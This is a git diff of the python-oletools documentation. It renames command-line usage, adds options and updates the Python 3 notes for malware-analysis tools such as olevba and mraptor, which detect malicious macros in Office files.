THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS “AS IS” AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
olevba contains modified source code from the officeparser project, published under the following MIT License (MIT):
officeparser is copyright (c) 2014 John William Davison
-Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the “Software”), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
mraptor is a tool designed to detect most malicious VBA Macros using generic heuristics. Unlike antivirus engines, it does not rely on signatures.
In a nutshell, mraptor detects keywords corresponding to the three following types of behaviour that are present in clear text in almost any macro malware: - A: Auto-execution trigger - W: Write to the file system or memory - X: Execute a file or any payload outside the VBA context
mraptor considers that a macro is suspicious when A and (W or X) is true.
-For more information about mraptor's detection algorithm, see the article How to detect most malicious macros without an antivirus.
+For more information about mraptor’s detection algorithm, see the article How to detect most malicious macros without an antivirus.
mraptor can be used either as a command-line tool, or as a python module from your own applications.
It is part of the python-oletools package.
Usage: mraptor.py [options] <filename> [filename2 ...]
+Usage: mraptor [options] <filename> [filename2 ...]
Options:
-h, --help show this help message and exit
@@ -41,18 +49,15 @@ Usage
- 20: SUSPICIOUS
Examples
Scan a single file:
-mraptor.py file.doc
-Scan a single file, stored in a Zip archive with password "infected":
-mraptor.py malicious_file.xls.zip -z infected
+mraptor file.doc
+Scan a single file, stored in a Zip archive with password “infected”:
+mraptor malicious_file.xls.zip -z infected
Scan a collection of files stored in a folder:
-mraptor.py "MalwareZoo/VBA/*"
+mraptor "MalwareZoo/VBA/*"
Important: on Linux/MacOSX, always add double quotes around a file name when you use wildcards such as *
and ?
. Otherwise, the shell may replace the argument with the actual list of files matching the wildcards before starting the script.
-
-
-
-
+![](mraptor1.png)
Python 3 support - mraptor3
-As of v0.50, mraptor has been ported to Python 3 thanks to @sebdraven. However, the differences between Python 2 and 3 are significant and for now there is a separate version of mraptor named mraptor3 to be used with Python 3.
+Since v0.54, mraptor is fully compatible with both Python 2 and 3. There is no need to use mraptor3 anymore, however it is still present for backward compatibility.
How to use mraptor in Python applications
TODO
@@ -65,16 +70,17 @@ python-oletools documentation
Contribute, Suggest Improvements or Report Issues
Tools:
diff --git a/oletools/doc/mraptor.md b/oletools/doc/mraptor.md
index c5b7f46f..55b55470 100644
--- a/oletools/doc/mraptor.md
+++ b/oletools/doc/mraptor.md
@@ -24,7 +24,7 @@ It is part of the [python-oletools](http://www.decalage.info/python/oletools) pa
## Usage
```text
-Usage: mraptor.py [options] [filename2 ...]
+Usage: mraptor [options] [filename2 ...]
Options:
-h, --help show this help message and exit
@@ -54,19 +54,19 @@ An exit code is returned based on the analysis result:
Scan a single file:
```text
-mraptor.py file.doc
+mraptor file.doc
```
Scan a single file, stored in a Zip archive with password "infected":
```text
-mraptor.py malicious_file.xls.zip -z infected
+mraptor malicious_file.xls.zip -z infected
```
Scan a collection of files stored in a folder:
```text
-mraptor.py "MalwareZoo/VBA/*"
+mraptor "MalwareZoo/VBA/*"
```
**Important**: on Linux/MacOSX, always add double quotes around a file name when you use
@@ -77,10 +77,8 @@ list of files matching the wildcards before starting the script.
## Python 3 support - mraptor3
-As of v0.50, mraptor has been ported to Python 3 thanks to @sebdraven.
-However, the differences between Python 2 and 3 are significant and for now
-there is a separate version of mraptor named mraptor3 to be used with
-Python 3.
+Since v0.54, mraptor is fully compatible with both Python 2 and 3.
+There is no need to use mraptor3 anymore, however it is still present for backward compatibility.
--------------------------------------------------------------------------
@@ -100,14 +98,15 @@ python-oletools documentation
- [[Install]]
- [[Contribute]], Suggest Improvements or Report Issues
- Tools:
+ - [[mraptor]]
+ - [[msodde]]
- [[olebrowse]]
+ - [[oledir]]
- [[oleid]]
+ - [[olemap]]
- [[olemeta]]
+ - [[oleobj]]
- [[oletimes]]
- - [[oledir]]
- - [[olemap]]
- [[olevba]]
- - [[mraptor]]
- [[pyxswf]]
- - [[oleobj]]
- [[rtfobj]]
diff --git a/oletools/doc/olebrowse.html b/oletools/doc/olebrowse.html
index 348889cd..3a2f4ae3 100644
--- a/oletools/doc/olebrowse.html
+++ b/oletools/doc/olebrowse.html
@@ -1,15 +1,23 @@
-
-
+
+
-
-
+
-
-
+
+ Untitled
+
+
olebrowse
-olebrowse is a simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to view and extract individual data streams.
+olebrowse is a simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to view and extract individual data streams.
It is part of the python-oletools package.
Dependencies
olebrowse requires Tkinter. On Windows and MacOSX, it should be installed with Python, and olebrowse should work out of the box.
@@ -18,24 +26,15 @@ Dependencies
And for Python 3:
sudo apt-get install python3-tk
Usage
-olebrowse.py [file]
+olebrowse [file]
If you provide a file it will be opened, else a dialog will allow you to browse folders to open a file. Then if it is a valid OLE file, the list of data streams will be displayed. You can select a stream, and then either view its content in a builtin hexadecimal viewer, or save it to a file for further analysis.
Screenshots
Main menu, showing all streams in the OLE file:
-
-
-
-
+![](olebrowse1_menu.png)
Menu with actions for a stream:
-
-
-
-
+![](olebrowse2_stream.png)
Hex view for a stream:
-
-
-
-
+![](olebrowse3_hexview.png)
python-oletools documentation
@@ -45,16 +44,17 @@ python-oletools documentation
- Contribute, Suggest Improvements or Report Issues
- Tools:
diff --git a/oletools/doc/olebrowse.md b/oletools/doc/olebrowse.md
index 57f727b1..3f984978 100644
--- a/oletools/doc/olebrowse.md
+++ b/oletools/doc/olebrowse.md
@@ -30,9 +30,9 @@ sudo apt-get install python3-tk
Usage
-----
-
- olebrowse.py [file]
-
+```
+olebrowse [file]
+```
If you provide a file it will be opened, else a dialog will allow you to browse
folders to open a file. Then if it is a valid OLE file, the list of data streams
will be displayed. You can select a stream, and then either view its content
@@ -63,14 +63,15 @@ python-oletools documentation
- [[Install]]
- [[Contribute]], Suggest Improvements or Report Issues
- Tools:
+ - [[mraptor]]
+ - [[msodde]]
- [[olebrowse]]
+ - [[oledir]]
- [[oleid]]
+ - [[olemap]]
- [[olemeta]]
+ - [[oleobj]]
- [[oletimes]]
- - [[oledir]]
- - [[olemap]]
- [[olevba]]
- - [[mraptor]]
- [[pyxswf]]
- - [[oleobj]]
- [[rtfobj]]
diff --git a/oletools/doc/oledir.html b/oletools/doc/oledir.html
index 1ea3e757..0b224465 100644
--- a/oletools/doc/oledir.html
+++ b/oletools/doc/oledir.html
@@ -1,11 +1,19 @@
-
-
+
+
-
-
+
-
-
+
+ Untitled
+
+
oledir
@@ -13,14 +21,22 @@ oledir
It can be used either as a command-line tool, or as a python module from your own applications.
It is part of the python-oletools package.
Usage
-Usage: oledir.py <filename>
+Usage: oledir [options] <filename> [filename2 ...]
+
+Options:
+ -h, --help show this help message and exit
+ -r find files recursively in subdirectories.
+ -z ZIP_PASSWORD, --zip=ZIP_PASSWORD
+ if the file is a zip archive, open all files from it,
+ using the provided password (requires Python 2.6+)
+ -f ZIP_FNAME, --zipfname=ZIP_FNAME
+ if the file is a zip archive, file(s) to be opened
+ within the zip. Wildcards * and ? are supported.
+ (default:*)
Examples
Scan a single file:
-oledir.py file.doc
-
-
-
-
+oledir file.doc
+![](oledir.png)
How to use oledir in Python applications
TODO
@@ -33,16 +49,17 @@ python-oletools documentation
Contribute, Suggest Improvements or Report Issues
Tools:
diff --git a/oletools/doc/oledir.md b/oletools/doc/oledir.md
index a0b81f1a..e520dbf1 100644
--- a/oletools/doc/oledir.md
+++ b/oletools/doc/oledir.md
@@ -11,7 +11,18 @@ It is part of the [python-oletools](http://www.decalage.info/python/oletools) pa
## Usage
```text
-Usage: oledir.py
+Usage: oledir [options] [filename2 ...]
+
+Options:
+ -h, --help show this help message and exit
+ -r find files recursively in subdirectories.
+ -z ZIP_PASSWORD, --zip=ZIP_PASSWORD
+ if the file is a zip archive, open all files from it,
+ using the provided password (requires Python 2.6+)
+ -f ZIP_FNAME, --zipfname=ZIP_FNAME
+ if the file is a zip archive, file(s) to be opened
+ within the zip. Wildcards * and ? are supported.
+ (default:*)
```
### Examples
@@ -19,7 +30,7 @@ Usage: oledir.py
Scan a single file:
```text
-oledir.py file.doc
+oledir file.doc
```
![](oledir.png)
@@ -41,14 +52,15 @@ python-oletools documentation
- [[Install]]
- [[Contribute]], Suggest Improvements or Report Issues
- Tools:
+ - [[mraptor]]
+ - [[msodde]]
- [[olebrowse]]
+ - [[oledir]]
- [[oleid]]
+ - [[olemap]]
- [[olemeta]]
+ - [[oleobj]]
- [[oletimes]]
- - [[oledir]]
- - [[olemap]]
- [[olevba]]
- - [[mraptor]]
- [[pyxswf]]
- - [[oleobj]]
- [[rtfobj]]
diff --git a/oletools/doc/oleid.html b/oletools/doc/oleid.html
index d2b6543e..7ccb46d3 100644
--- a/oletools/doc/oleid.html
+++ b/oletools/doc/oleid.html
@@ -1,56 +1,92 @@
-
-
+
+
-
-
+
-
-
+
+ Untitled
+
+
oleid
-oleid is a script to analyze OLE files such as MS Office documents (e.g. Word, Excel), to detect specific characteristics usually found in malicious files (e.g. malware). For example it can detect VBA macros and embedded Flash objects.
+oleid is a script to analyze OLE files such as MS Office documents (e.g. Word, Excel), to detect specific characteristics usually found in malicious files (e.g. malware). For example it can detect VBA macros and embedded Flash objects.
It is part of the python-oletools package.
Main Features
-- Detect OLE file type from its internal structure (e.g. MS Word, Excel, PowerPoint, ...)
+- Detect OLE file type from its internal structure (e.g. MS Word, Excel, PowerPoint, …)
- Detect VBA Macros
- Detect embedded Flash objects
- Detect embedded OLE objects
@@ -71,10 +107,10 @@ Main Features
- CSV output
Usage
-oleid.py <file>
+oleid <file>
Example
Analyzing a Word document containing a Flash object and VBA macros:
-C:\oletools>oleid.py word_flash_vba.doc
+C:\oletools>oleid word_flash_vba.doc
Filename: word_flash_vba.doc
+-------------------------------+-----------------------+
@@ -94,9 +130,9 @@ Example
+-------------------------------+-----------------------+
How to use oleid in your Python applications
First, import oletools.oleid, and create an OleID object to scan a file:
-import oletools.oleid
-
-oid = oletools.oleid.OleID(filename)
+
Note: filename can be a filename, a file-like object, or a bytes string containing the file to be analyzed.
Second, call the check() method. It returns a list of Indicator objects.
Each Indicator object has the following attributes:
@@ -104,15 +140,15 @@ How to use oleid in your P
id: str, identifier for the indicator
name: str, name to display the indicator
description: str, long description of the indicator
-type: class of the indicator (e.g. bool, str, int)
+type: class of the indicator (e.g. bool, str, int)
value: value of the indicator
For example, the following code displays all the indicators:
-indicators = oid.check()
-for i in indicators:
- print 'Indicator id=%s name="%s" type=%s value=%s' % (i.id, i.name, i.type, repr(i.value))
- print 'description:', i.description
- print ''
+indicators = oid.check()
+for i in indicators:
+ print 'Indicator id=%s name="%s" type=%s value=%s' % (i.id, i.name, i.type, repr(i.value))
+ print 'description:', i.description
+ print ''
See the source code of oleid.py for more details.
python-oletools documentation
@@ -123,16 +159,17 @@ python-oletools documentation
Contribute, Suggest Improvements or Report Issues
Tools:
diff --git a/oletools/doc/oleid.md b/oletools/doc/oleid.md
index 829c1e9e..9bcf1e8f 100644
--- a/oletools/doc/oleid.md
+++ b/oletools/doc/oleid.md
@@ -32,7 +32,7 @@ Planned improvements:
## Usage
```text
-oleid.py
+oleid
```
### Example
@@ -40,7 +40,7 @@ oleid.py
Analyzing a Word document containing a Flash object and VBA macros:
```text
-C:\oletools>oleid.py word_flash_vba.doc
+C:\oletools>oleid word_flash_vba.doc
Filename: word_flash_vba.doc
+-------------------------------+-----------------------+
@@ -104,14 +104,15 @@ python-oletools documentation
- [[Install]]
- [[Contribute]], Suggest Improvements or Report Issues
- Tools:
+ - [[mraptor]]
+ - [[msodde]]
- [[olebrowse]]
+ - [[oledir]]
- [[oleid]]
+ - [[olemap]]
- [[olemeta]]
+ - [[oleobj]]
- [[oletimes]]
- - [[oledir]]
- - [[olemap]]
- [[olevba]]
- - [[mraptor]]
- [[pyxswf]]
- - [[oleobj]]
- [[rtfobj]]
diff --git a/oletools/doc/olemap.html b/oletools/doc/olemap.html
index b6ffcf1e..4af5a3d2 100644
--- a/oletools/doc/olemap.html
+++ b/oletools/doc/olemap.html
@@ -1,11 +1,19 @@
-
-
+
+
-
-
+
-
-
+
+ Untitled
+
+
olemap
@@ -13,18 +21,12 @@ olemap
It can be used either as a command-line tool, or as a python module from your own applications.
It is part of the python-oletools package.
Usage
-Usage: olemap.py <filename>
+Usage: olemap <filename>
Examples
Scan a single file:
-olemap.py file.doc
-
-
-
-
-
-
-
-
+olemap file.doc
+![](olemap1.png)
+![](olemap2.png)
How to use olemap in Python applications
TODO
@@ -37,16 +39,17 @@ python-oletools documentation
Contribute, Suggest Improvements or Report Issues
Tools:
diff --git a/oletools/doc/olemap.md b/oletools/doc/olemap.md
index e00d2e67..8c0eac7f 100644
--- a/oletools/doc/olemap.md
+++ b/oletools/doc/olemap.md
@@ -10,7 +10,7 @@ It is part of the [python-oletools](http://www.decalage.info/python/oletools) pa
## Usage
```text
-Usage: olemap.py
+Usage: olemap
```
### Examples
@@ -18,7 +18,7 @@ Usage: olemap.py
Scan a single file:
```text
-olemap.py file.doc
+olemap file.doc
```
![](olemap1.png)
@@ -41,14 +41,15 @@ python-oletools documentation
- [[Install]]
- [[Contribute]], Suggest Improvements or Report Issues
- Tools:
+ - [[mraptor]]
+ - [[msodde]]
- [[olebrowse]]
+ - [[oledir]]
- [[oleid]]
+ - [[olemap]]
- [[olemeta]]
+ - [[oleobj]]
- [[oletimes]]
- - [[oledir]]
- - [[olemap]]
- [[olevba]]
- - [[mraptor]]
- [[pyxswf]]
- - [[oleobj]]
- [[rtfobj]]
diff --git a/oletools/doc/olemeta.html b/oletools/doc/olemeta.html
index adefef1a..302844eb 100644
--- a/oletools/doc/olemeta.html
+++ b/oletools/doc/olemeta.html
@@ -1,23 +1,28 @@
-
-
+
+
-
-
+
-
-
+
+ Untitled
+
+
olemeta
-olemeta is a script to parse OLE files such as MS Office documents (e.g. Word, Excel), to extract all standard properties present in the OLE file.
+olemeta is a script to parse OLE files such as MS Office documents (e.g. Word, Excel), to extract all standard properties present in the OLE file.
It is part of the python-oletools package.
Usage
-olemeta.py <file>
+olemeta <file>
Example
-
-
-
-
+![](olemeta1.png)
How to use olemeta in Python applications
TODO
@@ -29,16 +34,17 @@ python-oletools documentation
Contribute, Suggest Improvements or Report Issues
Tools:
diff --git a/oletools/doc/olemeta.md b/oletools/doc/olemeta.md
index e79c4555..6e0f569b 100644
--- a/oletools/doc/olemeta.md
+++ b/oletools/doc/olemeta.md
@@ -9,7 +9,7 @@ It is part of the [python-oletools](http://www.decalage.info/python/oletools) pa
## Usage
```text
-olemeta.py
+olemeta
```
### Example
@@ -30,14 +30,15 @@ python-oletools documentation
- [[Install]]
- [[Contribute]], Suggest Improvements or Report Issues
- Tools:
+ - [[mraptor]]
+ - [[msodde]]
- [[olebrowse]]
+ - [[oledir]]
- [[oleid]]
+ - [[olemap]]
- [[olemeta]]
+ - [[oleobj]]
- [[oletimes]]
- - [[oledir]]
- - [[olemap]]
- [[olevba]]
- - [[mraptor]]
- [[pyxswf]]
- - [[oleobj]]
- [[rtfobj]]
diff --git a/oletools/doc/oleobj.html b/oletools/doc/oleobj.html
index 1786efa5..56d0d568 100644
--- a/oletools/doc/oleobj.html
+++ b/oletools/doc/oleobj.html
@@ -1,11 +1,19 @@
-
-
+
+
-
-
+
-
-
+
+ Untitled
+
+
oleobj
@@ -27,16 +35,17 @@ python-oletools documentation
Contribute, Suggest Improvements or Report Issues
Tools:
diff --git a/oletools/doc/oleobj.md b/oletools/doc/oleobj.md
index ddf20611..b07ed7d3 100644
--- a/oletools/doc/oleobj.md
+++ b/oletools/doc/oleobj.md
@@ -31,14 +31,15 @@ python-oletools documentation
- [[Install]]
- [[Contribute]], Suggest Improvements or Report Issues
- Tools:
+ - [[mraptor]]
+ - [[msodde]]
- [[olebrowse]]
+ - [[oledir]]
- [[oleid]]
+ - [[olemap]]
- [[olemeta]]
+ - [[oleobj]]
- [[oletimes]]
- - [[oledir]]
- - [[olemap]]
- [[olevba]]
- - [[mraptor]]
- [[pyxswf]]
- - [[oleobj]]
- [[rtfobj]]
diff --git a/oletools/doc/oletimes.html b/oletools/doc/oletimes.html
index a020425a..04a6745a 100644
--- a/oletools/doc/oletimes.html
+++ b/oletools/doc/oletimes.html
@@ -1,21 +1,29 @@
-
-
+
+
-
-
+
-
-
+
+ Untitled
+
+
oletimes
-oletimes is a script to parse OLE files such as MS Office documents (e.g. Word, Excel), to extract creation and modification times of all streams and storages in the OLE file.
+oletimes is a script to parse OLE files such as MS Office documents (e.g. Word, Excel), to extract creation and modification times of all streams and storages in the OLE file.
It is part of the python-oletools package.
Usage
-oletimes.py <file>
+oletimes <file>
Example
Checking the malware sample DIAN_caso-5415.doc:
->oletimes.py DIAN_caso-5415.doc
+>oletimes DIAN_caso-5415.doc
+----------------------------+---------------------+---------------------+
| Stream/Storage name | Modification Time | Creation Time |
@@ -51,16 +59,17 @@ python-oletools documentation
Contribute, Suggest Improvements or Report Issues
Tools:
diff --git a/oletools/doc/oletimes.md b/oletools/doc/oletimes.md
index fb43ce1a..fe797908 100644
--- a/oletools/doc/oletimes.md
+++ b/oletools/doc/oletimes.md
@@ -10,7 +10,7 @@ It is part of the [python-oletools](http://www.decalage.info/python/oletools) pa
## Usage
```text
-oletimes.py
+oletimes
```
### Example
@@ -18,7 +18,7 @@ oletimes.py
Checking the malware sample [DIAN_caso-5415.doc](https://malwr.com/analysis/M2I4YWRhM2IwY2QwNDljN2E3ZWFjYTg3ODk4NmZhYmE/):
```text
->oletimes.py DIAN_caso-5415.doc
+>oletimes DIAN_caso-5415.doc
+----------------------------+---------------------+---------------------+
| Stream/Storage name | Modification Time | Creation Time |
@@ -59,14 +59,15 @@ python-oletools documentation
- [[Install]]
- [[Contribute]], Suggest Improvements or Report Issues
- Tools:
+ - [[mraptor]]
+ - [[msodde]]
- [[olebrowse]]
+ - [[oledir]]
- [[oleid]]
+ - [[olemap]]
- [[olemeta]]
+ - [[oleobj]]
- [[oletimes]]
- - [[oledir]]
- - [[olemap]]
- [[olevba]]
- - [[mraptor]]
- [[pyxswf]]
- - [[oleobj]]
- [[rtfobj]]
diff --git a/oletools/doc/olevba.html b/oletools/doc/olevba.html
index c718243d..010347b7 100644
--- a/oletools/doc/olevba.html
+++ b/oletools/doc/olevba.html
@@ -1,68 +1,105 @@
-
-
+
+
-
-
+
-
-
+
+ Untitled
+
+
olevba
-olevba is a script to parse OLE and OpenXML files such as MS Office documents (e.g. Word, Excel), to detect VBA Macros, extract their source code in clear text, and detect security-related patterns such as auto-executable macros, suspicious VBA keywords used by malware, anti-sandboxing and anti-virtualization techniques, and potential IOCs (IP addresses, URLs, executable filenames, etc). It also detects and decodes several common obfuscation methods including Hex encoding, StrReverse, Base64, Dridex, VBA expressions, and extracts IOCs from decoded strings.
+olevba is a script to parse OLE and OpenXML files such as MS Office documents (e.g. Word, Excel), to detect VBA Macros, extract their source code in clear text, and detect security-related patterns such as auto-executable macros, suspicious VBA keywords used by malware, anti-sandboxing and anti-virtualization techniques, and potential IOCs (IP addresses, URLs, executable filenames, etc). It also detects and decodes several common obfuscation methods including Hex encoding, StrReverse, Base64, Dridex, VBA expressions, and extracts IOCs from decoded strings. XLM/Excel 4 Macros are also supported in Excel and SLK files.
It can be used either as a command-line tool, or as a python module from your own applications.
It is part of the python-oletools package.
olevba is based on source code from officeparser by John William Davison, with significant modifications.
Supported formats
-- Word 97-2003 (.doc, .dot)
-- Word 2007+ (.docm, .dotm)
+- Word 97-2003 (.doc, .dot), Word 2007+ (.docm, .dotm)
+- Excel 97-2003 (.xls), Excel 2007+ (.xlsm, .xlsb)
+- PowerPoint 97-2003 (.ppt), PowerPoint 2007+ (.pptm, .ppsm)
+- Word/PowerPoint 2007+ XML (aka Flat OPC)
- Word 2003 XML (.xml)
-- Word/Excel MHTML, aka Single File Web Page (.mht)
-- Excel 97-2003 (.xls)
-- Excel 2007+ (.xlsm, .xlsb)
-- PowerPoint 2007+ (.pptm, .ppsm)
+- Word/Excel Single File Web Page / MHTML (.mht)
+- Publisher (.pub)
+- SYLK/SLK files (.slk)
- Text file containing VBA or VBScript source code
- Password-protected Zip archive containing any of the above
-Main Features
+S## Main Features
- Detect VBA macros in MS Office 97-2003 and 2007+ files, XML, MHT
- Extract VBA macro source code
@@ -81,9 +118,9 @@ Main Features
About VBA Macros
See this article for more information and technical details about VBA Macros and how they are stored in MS Office documents.
How it works
-
+
- olevba checks the file type: If it is an OLE file (i.e MS Office 97-2003), it is parsed right away.
-- If it is a zip file (i.e. MS Office 2007+), XML or MHTML, olevba looks for all OLE files stored in it (e.g. vbaProject.bin, editdata.mso), and opens them.
+- If it is a zip file (i.e. MS Office 2007+), XML or MHTML, olevba looks for all OLE files stored in it (e.g. vbaProject.bin, editdata.mso), and opens them.
- olevba identifies all the VBA projects stored in the OLE structure.
- Each VBA project is parsed to find the corresponding OLE streams containing macro code.
- In each of these OLE streams, the VBA macro source code is extracted and decompressed (RLE compression).
@@ -91,56 +128,65 @@ How it works
- olevba scans the macro source code and the deobfuscated strings to find suspicious keywords, auto-executable macros and potential IOCs (URLs, IP addresses, e-mail addresses, executable filenames, etc).
Usage
-Usage: olevba.py [options] <filename> [filename2 ...]
-
+Usage: olevba [options] <filename> [filename2 ...]
+
Options:
-h, --help show this help message and exit
-r find files recursively in subdirectories.
-z ZIP_PASSWORD, --zip=ZIP_PASSWORD
if the file is a zip archive, open all files from it,
- using the provided password (requires Python 2.6+)
+ using the provided password.
+ -p PASSWORD, --password=PASSWORD
+ if encrypted office files are encountered, try
+ decryption with this password. May be repeated.
-f ZIP_FNAME, --zipfname=ZIP_FNAME
if the file is a zip archive, file(s) to be opened
within the zip. Wildcards * and ? are supported.
(default:*)
- -t, --triage triage mode, display results as a summary table
- (default for multiple files)
- -d, --detailed detailed mode, display full results (default for
- single file)
-a, --analysis display only analysis results, not the macro source
code
-c, --code display only VBA source code, do not analyze it
- -i INPUT, --input=INPUT
- input file containing VBA source code to be analyzed
- (no parsing)
--decode display all the obfuscated strings with their decoded
content (Hex, Base64, StrReverse, Dridex, VBA).
--attr display the attribute lines at the beginning of VBA
source code
--reveal display the macro source code after replacing all the
- obfuscated strings by their decoded content.
+ obfuscated strings by their decoded content.
+ -l LOGLEVEL, --loglevel=LOGLEVEL
+ logging level debug/info/warning/error/critical
+ (default=warning)
+ --deobf Attempt to deobfuscate VBA expressions (slow)
+ --relaxed Do not raise errors if opening of substream fails
+
+ Output mode (mutually exclusive):
+ -t, --triage triage mode, display results as a summary table
+ (default for multiple files)
+ -d, --detailed detailed mode, display full results (default for
+ single file)
+ -j, --json json mode, detailed in json format (never default)
+New in v0.54: the -p option can now be used to decrypt encrypted documents using the provided password(s).
Examples
Scan a single file:
-olevba.py file.doc
-Scan a single file, stored in a Zip archive with password "infected":
-olevba.py malicious_file.xls.zip -z infected
+olevba file.doc
+Scan a single file, stored in a Zip archive with password “infected”:
+olevba malicious_file.xls.zip -z infected
Scan a single file, showing all obfuscated strings decoded:
-olevba.py file.doc --decode
+olevba file.doc --decode
Scan a single file, showing the macro source code with VBA strings deobfuscated:
-olevba.py file.doc --reveal
+olevba file.doc --reveal
Scan VBA source code extracted into a text file:
-olevba.py source_code.vba
+olevba source_code.vba
Scan a collection of files stored in a folder:
-olevba.py "MalwareZoo/VBA/*"
+olevba "MalwareZoo/VBA/*"
NOTE: On Linux, MacOSX and other Unix variants, it is required to add double quotes around wildcards. Otherwise, they will be expanded by the shell instead of olevba.
Scan all .doc and .xls files, recursively in all subfolders:
-olevba.py "MalwareZoo/VBA/*.doc" "MalwareZoo/VBA/*.xls" -r
+olevba "MalwareZoo/VBA/*.doc" "MalwareZoo/VBA/*.xls" -r
Scan all .doc files within all .zip files with password, recursively:
-olevba.py "MalwareZoo/VBA/*.zip" -r -z infected -f "*.doc"
+olevba "MalwareZoo/VBA/*.zip" -r -z infected -f "*.doc"
Detailed analysis mode (default for single file)
When a single file is scanned, or when using the option -d, all details of the analysis are displayed.
For example, checking the malware sample DIAN_caso-5415.doc:
->olevba.py c:\MalwareZoo\VBA\DIAN_caso-5415.doc.zip -z infected
+>olevba c:\MalwareZoo\VBA\DIAN_caso-5415.doc.zip -z infected
===============================================================================
FILE: DIAN_caso-5415.doc.malware in c:\MalwareZoo\VBA\DIAN_caso-5415.doc.zip
Type: OLE
@@ -210,7 +256,7 @@ Triage mode (default for multipl
- V: VBA string expressions (potential obfuscation)
Here is an example:
-c:\>olevba.py \MalwareZoo\VBA\samples\*
+c:\>olevba \MalwareZoo\VBA\samples\*
Flags Filename
----------- -----------------------------------------------------------------
OLE:MASI--- \MalwareZoo\VBA\samples\DIAN_caso-5415.doc.malware
@@ -230,47 +276,47 @@ Triage mode (default for multipl
OLE:MASI-B- \MalwareZoo\VBA\samples\ROVNIX.doc.malware
OLE:MA----- \MalwareZoo\VBA\samples\Word within Word macro auto.doc
Python 3 support - olevba3
-As of v0.50, olevba has been ported to Python 3 thanks to @sebdraven. However, the differences between Python 2 and 3 are significant and for now there is a separate version of olevba named olevba3 to be used with Python 3.
+Since v0.54, olevba is fully compatible with both Python 2 and 3. There is no need to use olevba3 anymore, however it is still present for backward compatibility.
How to use olevba in Python applications
olevba may be used to open a MS Office file, detect if it contains VBA macros, extract and analyze the VBA source code from your own python applications.
IMPORTANT: olevba is currently under active development, therefore this API is likely to change.
Import olevba
First, import the oletools.olevba package, using at least the VBA_Parser and VBA_Scanner classes:
-from oletools.olevba import VBA_Parser, TYPE_OLE, TYPE_OpenXML, TYPE_Word2003_XML, TYPE_MHTML
+
Parse a MS Office file - VBA_Parser
To parse a file on disk, create an instance of the VBA_Parser class, providing the name of the file to open as parameter. For example:
-vbaparser = VBA_Parser('my_file_with_macros.doc')
+
The file may also be provided as a bytes string containing its data. In that case, the actual filename must be provided for reference, and the file content with the data parameter. For example:
-myfile = 'my_file_with_macros.doc'
-filedata = open(myfile, 'rb').read()
-vbaparser = VBA_Parser(myfile, data=filedata)
+myfile = 'my_file_with_macros.doc'
+filedata = open(myfile, 'rb').read()
+vbaparser = VBA_Parser(myfile, data=filedata)
